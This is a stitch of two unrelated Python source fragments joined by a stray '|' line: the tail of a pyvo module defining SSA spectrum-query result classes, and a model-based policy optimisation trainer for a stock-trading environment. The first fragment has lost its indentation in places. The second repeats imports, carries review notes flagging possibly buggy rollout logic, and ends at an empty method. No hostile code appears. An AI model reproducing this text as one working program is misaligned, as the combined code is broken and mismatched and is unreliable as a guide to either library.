        return SSAResults(self.execute_votable(), self.getqueryurl())
class SSAResults(query.DALResults):
"""
The list of matching images resulting from a spectrum (SSA) query.
Each record contains a set of metadata that describes an available
spectrum matching the query constraints. The number of records in
the results is available via the :py:attr:`nrecs` attribute or by
passing it to the Python built-in ``len()`` function.
This class supports iterable semantics; thus,
individual records (in the form of
:py:class:`~pyvo.dal.ssa.SSARecord` instances) are typically
accessed by iterating over an ``SSAResults`` instance.
>>> results = pyvo.spectrumsearch(url, pos=[12.24, -13.1], size=0.2)
>>> for spec in results:
... print("{0}: {1}".format(spec.title, spec.getdataurl()))
Alternatively, records can be accessed randomly via
:py:meth:`getrecord` or through a Python Database API (v2)
Cursor (via :py:meth:`~pyvo.dal.query.DALResults.cursor`).
Column-based data access is possible via the
:py:meth:`~pyvo.dal.query.DALResults.getcolumn` method.
``SSAResults`` is essentially a wrapper around an Astropy
:py:mod:`~astropy.io.votable`
:py:class:`~astropy.io.votable.tree.Table` instance where the
columns contain the various metadata describing the spectra.
One can access that VOTable directly via the
:py:attr:`~pyvo.dal.query.DALResults.votable` attribute. Thus,
when one retrieves a whole column via
:py:meth:`~pyvo.dal.query.DALResults.getcolumn`, the result is
a Numpy array. Alternatively, one can manipulate the results
as an Astropy :py:class:`~astropy.table.table.Table` via the
following conversion:
>>> table = results.votable.to_table()
``SSAResults`` supports the array item operator ``[...]`` in a
read-only context. When the argument is numerical, the result
is an
:py:class:`~pyvo.dal.ssa.SSARecord` instance, representing the
record at the position given by the numerical index. If the
argument is a string, it is interpreted as the name of a column,
and the data from the column matching that name is returned as
a Numpy array.
"""
def __init__(self, votable, url=None):
"""
initialize the cursor. This constructor is not typically called
by directly applications; rather an instance is obtained from calling
a SSAQuery's execute().
"""
super(SSAResults, self).__init__(votable, url, "ssa", "1.0")
self._ssacols = {
"ssa:Query.Score": self.fieldname_with_utype("ssa:Query.Score"),
"ssa:Query.Token": self.fieldname_with_utype("ssa:Query.Token"),
"ssa:Association.Type": self.fieldname_with_utype("ssa:Association.Type"),
"ssa:Association.ID": self.fieldname_with_utype("ssa:Association.ID"),
"ssa:Association.Key": self.fieldname_with_utype("ssa:Association.Key"),
"ssa:Access.Reference": self.fieldname_with_utype("ssa:Access.Reference"),
"ssa:Access.Format": self.fieldname_with_utype("ssa:Access.Format"),
"ssa:Access.Size": self.fieldname_with_utype("ssa:Access.Size"),
"ssa:DataModel": self.fieldname_with_utype("ssa:DataModel"),
"ssa:Type": self.fieldname_with_utype("ssa:Type"),
"ssa:Length": self.fieldname_with_utype("ssa:Length"),
"ssa:TimeSI": self.fieldname_with_utype("ssa:TimeSI"),
"ssa:SpectralSI": self.fieldname_with_utype("ssa:SpectralSI"),
"ssa:FluxSI": self.fieldname_with_utype("ssa:FluxSI"),
"ssa:SpectralAxis": self.fieldname_with_utype("ssa:SpectralAxis"),
"ssa:FluxAxis": self.fieldname_with_utype("ssa:FluxAxis"),
"ssa:DataID.Title": self.fieldname_with_utype("ssa:DataID.Title"),
"ssa:DataID.Creator": self.fieldname_with_utype("ssa:DataID.Creator"),
"ssa:DataID.Collection": self.fieldname_with_utype("ssa:DataID.Collection"),
"ssa:DataID.DatasetID": self.fieldname_with_utype("ssa:DataID.DatasetID"),
"ssa:DataID.CreatorDID": self.fieldname_with_utype("ssa:DataID.CreatorDID"),
"ssa:DataID.Date": self.fieldname_with_utype("ssa:DataID.Date"),
"ssa:DataID.Version": self.fieldname_with_utype("ssa:DataID.Version"),
"ssa:DataID.Instrument": self.fieldname_with_utype("ssa:DataID.Instrument"),
"ssa:DataID.Bandpass": self.fieldname_with_utype("ssa:DataID.Bandpass"),
"ssa:DataID.DataSource": self.fieldname_with_utype("ssa:DataID.DataSource"),
"ssa:DataID.CreationType": self.fieldname_with_utype("ssa:DataID.CreationType"),
"ssa:DataID.Logo": self.fieldname_with_utype("ssa:DataID.Logo"),
"ssa:DataID.Contributor": self.fieldname_with_utype("ssa:DataID.Contributor"),
"ssa:Curation.Publisher": self.fieldname_with_utype("ssa:Curation.Publisher"),
"ssa:Curation.PublisherID": self.fieldname_with_utype("ssa:Curation.PublisherID"),
"ssa:Curation.PublisherDID": self.fieldname_with_utype("ssa:Curation.PublisherDID"),
"ssa:Curation.Date": self.fieldname_with_utype("ssa:Curation.Date"),
"ssa:Curation.Version": self.fieldname_with_utype("ssa:Curation.Version"),
"ssa:Curation.Rights": self.fieldname_with_utype("ssa:Curation.Rights"),
"ssa:Curation.Reference": self.fieldname_with_utype("ssa:Curation.Reference"),
"ssa:Curation.Contact.Name": self.fieldname_with_utype("ssa:Curation.Contact.Name"),
"ssa:Curation.Contact.Email": self.fieldname_with_utype("ssa:Curation.Contact.Email"),
"ssa:Target.Name": self.fieldname_with_utype("ssa:Target.Name"),
"ssa:Target.Description": self.fieldname_with_utype("ssa:Target.Description"),
"ssa:Target.Class": self.fieldname_with_utype("ssa:Target.Class"),
"ssa:Target.Pos": self.fieldname_with_utype("ssa:Target.Pos"),
"ssa:Target.SpectralClass": self.fieldname_with_utype("ssa:Target.SpectralClass"),
"ssa:Target.Redshift": self.fieldname_with_utype("ssa:Target.Redshift"),
"ssa:Target.VarAmpl": self.fieldname_with_utype("ssa:Target.VarAmpl"),
"ssa:Derived.SNR": self.fieldname_with_utype("ssa:Derived.SNR"),
"ssa:Derived.Redshift.Value": self.fieldname_with_utype("ssa:Derived.Redshift.Value"),
"ssa:Derived.Redshift.StatError": self.fieldname_with_utype("ssa:Derived.Redshift.StatError"),
"ssa:Derived.Redshift.Confidence": self.fieldname_with_utype("ssa:Derived.Redshift.Confidence"),
"ssa:Derived.VarAmpl": self.fieldname_with_utype("ssa:Derived.VarAmpl"),
"ssa:CoordSys.ID": self.fieldname_with_utype("ssa:CoordSys.ID"),
"ssa:CoordSys.SpaceFrame.Name": self.fieldname_with_utype("ssa:CoordSys.SpaceFrame.Name"),
"ssa:CoordSys.SpaceFrame.Ucd": self.fieldname_with_utype("ssa:CoordSys.SpaceFrame.Ucd"),
"ssa:CoordSys.SpaceFrame.RefPos": self.fieldname_with_utype("ssa:CoordSys.SpaceFrame.RefPos"),
"ssa:CoordSys.SpaceFrame.Equinox": self.fieldname_with_utype("ssa:CoordSys.SpaceFrame.Equinox"),
"ssa:CoordSys.TimeFrame.Name": self.fieldname_with_utype("ssa:CoordSys.TimeFrame.Name"),
"ssa:CoordSys.TimeFrame.Ucd": self.fieldname_with_utype("ssa:CoordSys.TimeFrame.Ucd"),
"ssa:CoordSys.TimeFrame.Zero": self.fieldname_with_utype("ssa:CoordSys.TimeFrame.Zero"),
"ssa:CoordSys.TimeFrame.RefPos": self.fieldname_with_utype("ssa:CoordSys.TimeFrame.RefPos"),
"ssa:CoordSys.SpectralFrame.Name": self.fieldname_with_utype("ssa:CoordSys.SpectralFrame.Name"),
"ssa:CoordSys.SpectralFrame.Ucd": self.fieldname_with_utype("ssa:CoordSys.SpectralFrame.Ucd"),
"ssa:CoordSys.SpectralFrame.RefPos": self.fieldname_with_utype("ssa:CoordSys.SpectralFrame.RefPos"),
"ssa:CoordSys.SpectralFrame.Redshift": self.fieldname_with_utype("ssa:CoordSys.SpectralFrame.Redshift"),
"ssa:CoordSys.RedshiftFrame.Name": self.fieldname_with_utype("ssa:CoordSys.RedshiftFrame.Name"),
"ssa:CoordSys.RedshiftFrame.DopplerDefinition": self.fieldname_with_utype("ssa:CoordSys.RedshiftFrame.DopplerDefinition"),
"ssa:CoordSys.RedshiftFrame.RefPos": self.fieldname_with_utype("ssa:CoordSys.RedshiftFrame.RefPos"),
"ssa:Char.SpatialAxis.Name": self.fieldname_with_utype("ssa:Char.SpatialAxis.Name"),
"ssa:Char.SpatialAxis.Ucd": self.fieldname_with_utype("ssa:Char.SpatialAxis.Ucd"),
"ssa:Char.SpatialAxis.Unit": self.fieldname_with_utype("ssa:Char.SpatialAxis.Unit"),
"ssa:Char.SpatialAxis.Coverage.Location.Value": self.fieldname_with_utype("ssa:Char.SpatialAxis.Coverage.Location.Value"),
"ssa:Char.SpatialAxis.Coverage.Bounds.Extent": self.fieldname_with_utype("ssa:Char.SpatialAxis.Coverage.Bounds.Extent"),
"ssa:Char.SpatialAxis.Coverage.Support.Area": self.fieldname_with_utype("ssa:Char.SpatialAxis.Coverage.Support.Area"),
"ssa:Char.SpatialAxis.Coverage.Support.Extent": self.fieldname_with_utype("ssa:Char.SpatialAxis.Coverage.Support.Extent"),
"ssa:Char.SpatialAxis.SamplingPrecision.SampleExtent": self.fieldname_with_utype("ssa:Char.SpatialAxis.SamplingPrecision.SampleExtent"),
"ssa:Char.SpatialAxis.SamplingPrecision.SamplingPrecisionRefVal.FillFactor": self.fieldname_with_utype("ssa:Char.SpatialAxis.SamplingPrecision.SamplingPrecisionRefVal.FillFactor"),
"ssa:Char.SpatialAxis.Accuracy.StatError": self.fieldname_with_utype("ssa:Char.SpatialAxis.Accuracy.StatError"),
"ssa:Char.SpatialAxis.Accuracy.SysError": self.fieldname_with_utype("ssa:Char.SpatialAxis.Accuracy.SysError"),
"ssa:Char.SpatialAxis.Calibration": self.fieldname_with_utype("ssa:Char.SpatialAxis.Calibration"),
"ssa:Char.SpatialAxis.Resolution": self.fieldname_with_utype("ssa:Char.SpatialAxis.Resolution"),
"ssa:Char.SpectralAxis.Name": self.fieldname_with_utype("ssa:Char.SpectralAxis.Name"),
"ssa:Char.SpectralAxis.Ucd": self.fieldname_with_utype("ssa:Char.SpectralAxis.Ucd"),
"ssa:Char.SpectralAxis.Unit": self.fieldname_with_utype("ssa:Char.SpectralAxis.Unit"),
"ssa:Char.SpectralAxis.Coverage.Location.Value": self.fieldname_with_utype("ssa:Char.SpectralAxis.Coverage.Location.Value"),
"ssa:Char.SpectralAxis.Coverage.Bounds.Extent": self.fieldname_with_utype("ssa:Char.SpectralAxis.Coverage.Bounds.Extent"),
"ssa:Char.SpectralAxis.Coverage.Bounds.Start": self.fieldname_with_utype("ssa:Char.SpectralAxis.Coverage.Bounds.Start"),
"ssa:Char.SpectralAxis.Coverage.Bounds.Stop": self.fieldname_with_utype("ssa:Char.SpectralAxis.Coverage.Bounds.Stop"),
"ssa:Char.SpectralAxis.Coverage.Support.Extent": self.fieldname_with_utype("ssa:Char.SpectralAxis.Coverage.Support.Extent"),
"ssa:Char.SpectralAxis.SamplingPrecision.SampleExtent": self.fieldname_with_utype("ssa:Char.SpectralAxis.SamplingPrecision.SampleExtent"),
"ssa:Char.SpectralAxis.SamplingPrecision.SamplingPrecisionRefVal.FillFactor": self.fieldname_with_utype("ssa:Char.SpectralAxis.SamplingPrecision.SamplingPrecisionRefVal.FillFactor"),
"ssa:Char.SpectralAxis.Accuracy.BinSize": self.fieldname_with_utype("ssa:Char.SpectralAxis.Accuracy.BinSize"),
"ssa:Char.SpectralAxis.Accuracy.StatError": self.fieldname_with_utype("ssa:Char.SpectralAxis.Accuracy.StatError"),
"ssa:Char.SpectralAxis.Accuracy.SysError": self.fieldname_with_utype("ssa:Char.SpectralAxis.Accuracy.SysError"),
"ssa:Char.SpectralAxis.Calibration": self.fieldname_with_utype("ssa:Char.SpectralAxis.Calibration"),
"ssa:Char.SpectralAxis.Resolution": self.fieldname_with_utype("ssa:Char.SpectralAxis.Resolution"),
"ssa:Char.SpectralAxis.ResPower": self.fieldname_with_utype("ssa:Char.SpectralAxis.ResPower"),
"ssa:Char.TimeAxis.Name": self.fieldname_with_utype("ssa:Char.TimeAxis.Name"),
"ssa:Char.TimeAxis.Ucd": self.fieldname_with_utype("ssa:Char.TimeAxis.Ucd"),
"ssa:Char.TimeAxis.Unit": self.fieldname_with_utype("ssa:Char.TimeAxis.Unit"),
"ssa:Char.TimeAxis.Coverage.Location.Value": self.fieldname_with_utype("ssa:Char.TimeAxis.Coverage.Location.Value"),
"ssa:Char.TimeAxis.Coverage.Bounds.Extent": self.fieldname_with_utype("ssa:Char.TimeAxis.Coverage.Bounds.Extent"),
"ssa:Char.TimeAxis.Coverage.Bounds.Start": self.fieldname_with_utype("ssa:Char.TimeAxis.Coverage.Bounds.Start"),
"ssa:Char.TimeAxis.Coverage.Bounds.Stop": self.fieldname_with_utype("ssa:Char.TimeAxis.Coverage.Bounds.Stop"),
"ssa:Char.TimeAxis.Coverage.Support.Extent": self.fieldname_with_utype("ssa:Char.TimeAxis.Coverage.Support.Extent"),
"ssa:Char.TimeAxis.SamplingPrecision.SampleExtent": self.fieldname_with_utype("ssa:Char.TimeAxis.SamplingPrecision.SampleExtent"),
"ssa:Char.TimeAxis.SamplingPrecision.SamplingPrecisionRefVal.FillFactor": self.fieldname_with_utype("ssa:Char.TimeAxis.SamplingPrecision.SamplingPrecisionRefVal.FillFactor"),
"ssa:Char.TimeAxis.Accuracy.BinSize": self.fieldname_with_utype("ssa:Char.TimeAxis.Accuracy.BinSize"),
"ssa:Char.TimeAxis.Accuracy.StatError": self.fieldname_with_utype("ssa:Char.TimeAxis.Accuracy.StatError"),
"ssa:Char.TimeAxis.Accuracy.SysError": self.fieldname_with_utype("ssa:Char.TimeAxis.Accuracy.SysError"),
"ssa:Char.TimeAxis.Calibration": self.fieldname_with_utype("ssa:Char.TimeAxis.Calibration"),
"ssa:Char.TimeAxis.Resolution": self.fieldname_with_utype("ssa:Char.TimeAxis.Resolution"),
"ssa:Char.FluxAxis.Name": self.fieldname_with_utype("ssa:Char.FluxAxis.Name"),
"ssa:Char.FluxAxis.Ucd": self.fieldname_with_utype("ssa:Char.FluxAxis.Ucd"),
"ssa:Char.FluxAxis.Unit": self.fieldname_with_utype("ssa:Char.FluxAxis.Unit"),
"ssa:Char.FluxAxis.Accuracy.StatError": self.fieldname_with_utype("ssa:Char.FluxAxis.Accuracy.StatError"),
"ssa:Char.FluxAxis.Accuracy.SysError": self.fieldname_with_utype("ssa:Char.FluxAxis.Accuracy.SysError"),
"ssa:Char.FluxAxis.Calibration": self.fieldname_with_utype("ssa:Char.FluxAxis.Calibration"),
"ssa:Data.SpectralAxis.Value": self.fieldname_with_utype("ssa:Data.SpectralAxis.Value"),
"ssa:Data.SpectralAxis.Ucd": self.fieldname_with_utype("ssa:Data.SpectralAxis.Ucd"),
"ssa:Data.SpectralAxis.Unit": self.fieldname_with_utype("ssa:Data.SpectralAxis.Unit"),
"ssa:Data.SpectralAxis.Accuracy.BinSize": self.fieldname_with_utype("ssa:Data.SpectralAxis.Accuracy.BinSize"),
"ssa:Data.SpectralAxis.Accuracy.BinLow": self.fieldname_with_utype("ssa:Data.SpectralAxis.Accuracy.BinLow"),
"ssa:Data.SpectralAxis.Accuracy.BinHigh": self.fieldname_with_utype("ssa:Data.SpectralAxis.Accuracy.BinHigh"),
"ssa:Data.SpectralAxis.Accuracy.StatError": self.fieldname_with_utype("ssa:Data.SpectralAxis.Accuracy.StatError"),
"ssa:Data.SpectralAxis.Accuracy.StatErrLow": self.fieldname_with_utype("ssa:Data.SpectralAxis.Accuracy.StatErrLow"),
"ssa:Data.SpectralAxis.Accuracy.StatErrHigh": self.fieldname_with_utype("ssa:Data.SpectralAxis.Accuracy.StatErrHigh"),
"ssa:Data.SpectralAxis.Accuracy.SysError": self.fieldname_with_utype("ssa:Data.SpectralAxis.Accuracy.SysError"),
"ssa:Data.SpectralAxis.Resolution": self.fieldname_with_utype("ssa:Data.SpectralAxis.Resolution"),
"ssa:Data.FluxAxis.Value": self.fieldname_with_utype("ssa:Data.FluxAxis.Value"),
"ssa:Data.FluxAxis.Ucd": self.fieldname_with_utype("ssa:Data.FluxAxis.Ucd"),
"ssa:Data.FluxAxis.Unit": self.fieldname_with_utype("ssa:Data.FluxAxis.Unit"),
"ssa:Data.FluxAxis.Accuracy.StatError": self.fieldname_with_utype("ssa:Data.FluxAxis.Accuracy.StatError"),
"ssa:Data.FluxAxis.Accuracy.StatErrLow": self.fieldname_with_utype("ssa:Data.FluxAxis.Accuracy.StatErrLow"),
"ssa:Data.FluxAxis.Accuracy.StatErrHigh": self.fieldname_with_utype("ssa:Data.FluxAxis.Accuracy.StatErrHigh"),
"ssa:Data.FluxAxis.Accuracy.SysError": self.fieldname_with_utype("ssa:Data.FluxAxis.Accuracy.SysError"),
"ssa:Data.FluxAxis.Quality": self.fieldname_with_utype("ssa:Data.FluxAxis.Quality"),
"ssa:Data.FluxAxis.Quality.n": self.fieldname_with_utype("ssa:Data.FluxAxis.Quality.n"),
"ssa:Data.TimeAxis.Value": self.fieldname_with_utype("ssa:Data.TimeAxis.Value"),
"ssa:Data.TimeAxis.Ucd": self.fieldname_with_utype("ssa:Data.TimeAxis.Ucd"),
"ssa:Data.TimeAxis.Unit": self.fieldname_with_utype("ssa:Data.TimeAxis.Unit"),
"ssa:Data.TimeAxis.Accuracy.BinSize": self.fieldname_with_utype("ssa:Data.TimeAxis.Accuracy.BinSize"),
"ssa:Data.TimeAxis.Accuracy.BinLow": self.fieldname_with_utype("ssa:Data.TimeAxis.Accuracy.BinLow"),
"ssa:Data.TimeAxis.Accuracy.BinHigh": self.fieldname_with_utype("ssa:Data.TimeAxis.Accuracy.BinHigh"),
"ssa:Data.TimeAxis.Accuracy.StatError": self.fieldname_with_utype("ssa:Data.TimeAxis.Accuracy.StatError"),
"ssa:Data.TimeAxis.Accuracy.StatErrLow": self.fieldname_with_utype("ssa:Data.TimeAxis.Accuracy.StatErrLow"),
"ssa:Data.TimeAxis.Accuracy.StatErrHigh": self.fieldname_with_utype("ssa:Data.TimeAxis.Accuracy.StatErrHigh"),
"ssa:Data.TimeAxis.Accuracy.SysError": self.fieldname_with_utype("ssa:Data.TimeAxis.Accuracy.SysError"),
"ssa:Data.TimeAxis.Resolution": self.fieldname_with_utype("ssa:Data.TimeAxis.Resolution"),
"ssa:Data.BackgroundModel.Value": self.fieldname_with_utype("ssa:Data.BackgroundModel.Value"),
"ssa:Data.BackgroundModel.Ucd": self.fieldname_with_utype("ssa:Data.BackgroundModel.Ucd"),
"ssa:Data.BackgroundModel.Unit": self.fieldname_with_utype("ssa:Data.BackgroundModel.Unit"),
"ssa:Data.BackgroundModel.Accuracy.StatError": self.fieldname_with_utype("ssa:Data.BackgroundModel.Accuracy.StatError"),
"ssa:Data.BackgroundModel.Accuracy.StatErrLow": self.fieldname_with_utype("ssa:Data.BackgroundModel.Accuracy.StatErrLow"),
"ssa:Data.BackgroundModel.Accuracy.StatErrHigh": self.fieldname_with_utype("ssa:Data.BackgroundModel.Accuracy.StatErrHigh"),
"ssa:Data.BackgroundModel.Accuracy.SysError": self.fieldname_with_utype("ssa:Data.BackgroundModel.Accuracy.SysError"),
"ssa:Data.BackgroundModel.Quality": self.fieldname_with_utype("ssa:Data.BackgroundModel.Quality")
}
self._recnames = { "title": self._ssacols["ssa:DataID.Title"],
# RA and Dec are not separately specified
"pos": self._ssacols["ssa:Target.Pos"],
"instr": self._ssacols["ssa:DataID.Instrument"],
# This does not exist specifically in SSA but the closest is
"dateobs": self._ssacols["ssa:DataID.Date"],
"format": self._ssacols["ssa:Access.Format"],
"acref": self._ssacols["ssa:Access.Reference"]
}
    def getrecord(self, index):
        """
        return an SSA result record that follows dictionary
        semantics. The keys of the dictionary are those returned by this
        instance's fieldNames() function: either the column IDs or name, if
        the ID is not set. The returned record has additional accessor
        methods for getting at standard SSA response metadata (e.g. ra, dec).

        Parameters
        ----------
        index : int
            the integer index of the desired record where 0 returns the first
            record

        Returns
        -------
        SSARecord
            a dictionary-like record containing the spectrum metadata from
            the requested record.

        See Also
        --------
        SSARecord
        """
        return SSARecord(self, index)
class SSARecord(query.Record):
    """
    a dictionary-like container for one record from the results of an
    SSA query, describing an available spectrum.

    Metadata standardized by the SSA protocol are exposed as attributes;
    an attribute evaluates to None when the underlying metadatum is not
    available.  All metadata, standard and non-standard, can be fetched
    with the ``get(`` *key* ``)`` function (or the [*key*] operator),
    where *key* is a table column name.
    """

    def __init__(self, results, index):
        # explicit two-argument super() form keeps Python 2 compatibility
        super(SSARecord, self).__init__(results, index)
        self._utypecols = results._ssacols
        self._names = results._recnames

    @property
    def ra(self):
        """
        return the right ascension of the center of the spectrum
        """
        pos = self.get(self._names["pos"])
        return pos[0]

    @property
    def dec(self):
        """
        return the declination of the center of the spectrum
        """
        pos = self.get(self._names["pos"])
        return pos[1]

    @property
    def title(self):
        """
        return the title of the spectrum
        """
        return self.get(self._names["title"])

    @property
    def format(self):
        """
        return the file format the spectrum is stored in
        """
        return self.get(self._names["format"])

    @property
    def dateobs(self):
        """
        return the modified Julian date (MJD) of the mid-point of the
        observational data that went into the spectrum
        """
        return self.get(self._names["dateobs"])

    @property
    def instr(self):
        """
        return the name of the instrument (or instruments) that produced
        the data that went into this spectrum.
        """
        return self.get(self._names["instr"])

    @property
    def acref(self):
        """
        return the URL that can be used to retrieve the spectrum.
        The value is always a native string -- unicode on Python 3 and a
        byte-string on Python 2 -- so it is directly usable as a URL with
        urllib functions.
        """
        return self._get_to_str(self._names["acref"])

    def getdataurl(self):
        """
        return the URL contained in the access URL column which can be
        used to retrieve the dataset described by this record, or None if
        no such column exists.  The value is a native string (see
        ``acref``) ready for use with urllib functions.
        """
        return self.acref

    def suggest_dataset_basename(self):
        """
        return a default base filename that the dataset available via
        ``getdataset()`` can be saved as.  This specialization is used by
        ``cachedataset()`` via ``make_dataset_filename()``.
        """
        name = self.title
        if query._is_python3 and isinstance(name, bytes):
            name = name.decode('utf-8')
        if not name:
            return "spectrum"
        return re.sub(r'\s+', '_', name.strip())

    def suggest_extension(self, default=None):
        """
        return a recommended filename extension for the dataset described
        by this record, chosen from the record's format column; *default*
        is used as the fallback.
        """
        return query.mime2extension(self.format, default)
|
import numpy as np
from datetime import datetime, timedelta # 记录outputs_time,记录循环用时
from typing import Optional, Tuple, cast
import hydra.utils
import numpy as np
import omegaconf
from omegaconf import dictconfig
import torch
import math
# matplotlib.use('Agg')
#%matplotlib inline
import torch
import omegaconf
from pathlib import Path
import logging
import shutil
import sys, os
import pickle
import plot
import analysis
current_dir = Path(os.path.realpath("."))
from finrl.neo_finrl.preprocessor.yahoodownloader import YahooDownloader
from finrl.neo_finrl.preprocessor.preprocessors import FeatureEngineer
from mbrl.models import (
OneDTransitionRewardModel,
ModelEnv,
ModelTrainer,
)
import mbrl.types as mbrl_types
import mbrl.util as mbrl_util
import mbrl.util.common as mbrl_common
import mbrl.constants as mbrl_constants
import mbrl.planning as mbrl_planning
from mbrl.util import ReplayBuffer
import mbrl.third_party.pytorch_sac as pytorch_sac
from env_stocktrading import StockTradingEnv
import plot
from mbrl_fin import MBRLFin
# Columns logged per evaluation: the standard mbrl evaluation format plus
# the training epoch index ("E") and the current model rollout horizon ("RL").
MBPO_LOG_FORMAT = mbrl_constants.EVAL_LOG_FORMAT + [
    ("epoch", "E", "int"),
    ("rollout_length", "RL", "int"),
]
class MBPOFin(MBRLFin):
    """
    MBPO (Model-Based Policy Optimization) trainer specialized for the
    stock-trading environment.

    A one-dimensional transition/reward model of the market is learned from
    real transitions, and a SAC agent is trained on short rollouts generated
    by that model, following the mbrl-lib MBPO recipe.
    """

    def __init__(
        self,
        cfg: omegaconf.DictConfig,
        flogger: logging.Logger,
        checkpoint_dir: Path,
        checkpoint: str = None,
    ):
        """
        Parameters
        ----------
        cfg : hydra/omegaconf configuration with ``algorithm``, ``overrides``
            and ``dynamics_model`` sections.
        flogger : logger used for progress messages.
        checkpoint_dir : directory under which checkpoints are written.
        checkpoint : optional checkpoint sub-directory name to load from.
        """
        super().__init__(cfg, flogger, checkpoint_dir, checkpoint)
        # Both are populated by create_models(); None until then.
        self.dynamics_model: OneDTransitionRewardModel = None
        self.agent: pytorch_sac.SACAgent = None
        # Per-rollout diagnostics gathered by
        # rollout_model_and_populate_sac_buffer(); can grow to many GB.
        self.dynamics_model_stat = []

    def create_models(self, env: StockTradingEnv):
        """Instantiate the SAC agent and the dynamics model for ``env``."""
        mbrl_planning.complete_agent_cfg(env, self.cfg.algorithm.agent)
        self.agent: pytorch_sac.SACAgent = hydra.utils.instantiate(
            self.cfg.algorithm.agent
        )
        self.dynamics_model: OneDTransitionRewardModel = (
            mbrl_common.create_one_dim_tr_model(
                self.cfg, env.observation_space.shape, env.action_space.shape
            )
        )

    # NOTE(review): the name is misspelled ("checkpiont") but is kept because
    # it is part of the public interface; train() calls it by this name.
    def save_checkpiont(self):
        """Save config, dynamics model and SAC agent into a timestamped dir."""
        # Naive local time shifted by +8h (UTC+8); prefer
        # datetime.now(timezone(timedelta(hours=8))) in new code.
        time_current = datetime.now() + timedelta(hours=8)
        # NOTE(review): the pattern skips seconds and embeds ':' in the
        # directory name, which is invalid on Windows -- confirm before reuse.
        time_current = time_current.strftime("%Y-%m-%d_%H:%M:%f")
        save_dir = (
            self.checkpoint_dir
            / f"{self.cfg.algorithm.name}_{self.cfg.market.name}_{time_current}"
        )
        save_dir.mkdir(parents=True, exist_ok=True)
        # Save the hydra-resolved run configuration alongside the weights.
        config_file = "config.yaml"
        config_path = Path(f"./.hydra/{config_file}")
        shutil.copyfile(config_path, save_dir / f"{config_file}")
        # Save the environment (dynamics) model.
        self.dynamics_model.save(save_dir)
        # Save the SAC agent.
        self.agent.save(save_dir)

    def load_checkpoint(self):
        """Restore config, dynamics model and SAC agent from ``self.checkpoint``."""
        checkpoint = self.checkpoint_dir / self.checkpoint
        assert checkpoint.is_dir()
        # Restore the saved run configuration into the hydra output dir.
        config_file = "config.yaml"
        config_path = Path(f"./.hydra/{config_file}")
        shutil.copyfile(checkpoint / f"{config_file}", config_path)
        self.dynamics_model.load(checkpoint)
        self.agent.load(checkpoint)

    def rollout_model_and_populate_sac_buffer(
        self,
        model_env: ModelEnv,
        replay_buffer: ReplayBuffer,
        sac_buffer: pytorch_sac.ReplayBuffer,
        sac_samples_action: bool,
        rollout_horizon: int,
        batch_size: int,
    ):
        """
        Roll the learned model forward from real states and store the
        imagined transitions in the SAC replay buffer.

        ``batch_size`` real states are sampled from ``replay_buffer`` and
        advanced ``rollout_horizon`` steps through ``model_env`` with the
        current SAC policy; every imagined transition that passes the
        done/mask filters is appended to ``sac_buffer``.  Raw rollout data
        are also appended to ``self.dynamics_model_stat`` for analysis.
        """
        batch = replay_buffer.sample(batch_size)
        initial_obs, *_ = cast(mbrl_types.TransitionBatch, batch).astuple()
        obs = model_env.reset(
            initial_obs_batch=cast(np.ndarray, initial_obs),
            return_as_np=True,
        )
        accum_dones = np.zeros(obs.shape[0], dtype=bool)
        accum_masked = np.ones(obs.shape[0], dtype=bool)
        # Dynamics-model statistics collected step by step.
        current_obs = []
        current_actions = []
        next_obs = []
        next_rewards = []
        next_dones = []
        for i in range(rollout_horizon):
            action = self.agent.act(obs, sample=sac_samples_action, batched=True)
            model_env.dynamics_model.model.update_mask_ratio(rollout_horizon, i)
            current_obs.append(model_env._current_obs.clone().detach().cpu())
            current_actions.append(action)
            pred_next_obs, pred_rewards, pred_dones, _ = model_env.step(
                action, sample=True
            )
            next_obs.append(pred_next_obs)
            next_rewards.append(pred_rewards)
            next_dones.append(pred_dones)
            filters = ~accum_dones
            # Mask handling only applies to the "mask" propagation method.
            if self.cfg.dynamics_model.model.propagation_method == "mask":
                mask = model_env.dynamics_model.model.mask.cpu().detach().numpy()
                uncertainty = (
                    model_env.dynamics_model.model.uncertainty.cpu()
                    .detach()
                    .unsqueeze(1)
                    .numpy()
                )
                # Penalize imagined rewards by model uncertainty.
                pred_rewards -= uncertainty * self.cfg.dynamics_model.mask_penalty
                accum_masked &= mask
                if self.cfg.dynamics_model.mask_mode == "nonstop":
                    filters &= mask
                elif self.cfg.dynamics_model.mask_mode == "hardstop":
                    filters &= accum_masked
                else:
                    # BUG FIX: this used to be `assert "Unknown mask mode."`,
                    # which is always true and silently ignored bad configs.
                    raise ValueError(
                        f"Unknown mask mode: {self.cfg.dynamics_model.mask_mode}"
                    )
            pred_dones = pred_dones.reshape((pred_dones.shape[0], 1))
            sac_buffer.add_batch(
                obs[filters],
                action[filters],
                pred_rewards[filters],
                pred_next_obs[filters],
                pred_dones[filters],
                pred_dones[filters],
            )
            obs = pred_next_obs
            # NOTE(review): upstream mbrl-lib accumulates dones with `|=`;
            # `&= ~` keeps accum_dones all-False forever (it starts at zeros),
            # so trajectories are never filtered out after a predicted done.
            # The original "must not done" comment suggests this may be
            # intentional -- confirm before changing.
            accum_dones &= ~pred_dones.squeeze()
        self.dynamics_model_stat.append(
            {
                "initial_batch": batch,
                "obs": np.concatenate(current_obs, axis=0),
                "actions": np.concatenate(current_actions, axis=0),
                "next_obs": np.concatenate(next_obs, axis=0),
                "next_rewards": np.concatenate(next_rewards, axis=0),
                "next_dones": np.concatenate(next_dones, axis=0),
            }
        )

    def maybe_replace_sac_buffer(
        self,
        sac_buffer: Optional[pytorch_sac.ReplayBuffer],
        new_capacity: int,
        obs_shape: Tuple[int],
        act_shape: Tuple[int],
    ):
        """
        Return a SAC replay buffer with ``new_capacity``, preserving data.

        If ``sac_buffer`` is None or its capacity differs, a new buffer is
        allocated and any existing transitions are copied over; otherwise
        the buffer is returned unchanged.
        """
        if sac_buffer is not None and new_capacity == sac_buffer.capacity:
            return sac_buffer
        new_buffer = pytorch_sac.ReplayBuffer(
            obs_shape, act_shape, new_capacity, self.cfg.device
        )
        if sac_buffer is None:
            return new_buffer
        n = len(sac_buffer)
        new_buffer.add_batch(
            sac_buffer.obses[:n],
            sac_buffer.actions[:n],
            sac_buffer.rewards[:n],
            sac_buffer.next_obses[:n],
            np.logical_not(sac_buffer.not_dones[:n]),
            np.logical_not(sac_buffer.not_dones_no_max[:n]),
        )
        return new_buffer

    def termination_fn(self, actions: torch.Tensor, next_observs: torch.Tensor):
        """Episodes never terminate from the model's point of view."""
        return torch.full((actions.shape[0], 1), False, device=actions.device)

    def save_stats(self):
